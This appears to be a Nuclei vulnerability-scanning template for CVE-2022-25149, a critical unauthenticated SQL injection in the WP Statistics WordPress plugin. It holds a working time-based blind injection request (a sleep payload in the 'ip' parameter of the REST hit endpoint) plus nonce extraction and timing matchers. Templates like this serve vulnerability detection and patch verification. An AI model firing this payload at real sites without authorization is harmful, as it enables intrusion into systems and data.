52 lines
1.8 KiB
YAML
52 lines
1.8 KiB
YAML
|
id: CVE-2022-25149
|
||
|
|
||
|
info:
|
||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||
|
author: theamanrawat
|
||
|
severity: critical
|
||
|
description: |
|
||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||
|
reference:
|
||
|
- https://wordpress.org/plugins/wp-statistics/
|
||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25149
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2022-25149
|
||
|
cwe-id: CWE-89
|
||
|
metadata:
|
||
|
max-request: 2
|
||
|
verified: true
|
||
|
publicwww-query: "/wp-content/plugins/wp-statistics/"
|
||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
- |
|
||
|
@timeout: 50s
|
||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
host-redirects: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- duration>=6
|
||
|
- status_code == 200
|
||
|
- contains(header, "application/json")
|
||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||
|
condition: and
|
||
|
|
||
|
extractors:
|
||
|
- type: regex
|
||
|
name: nonce
|
||
|
group: 1
|
||
|
regex:
|
||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||
|
internal: true
|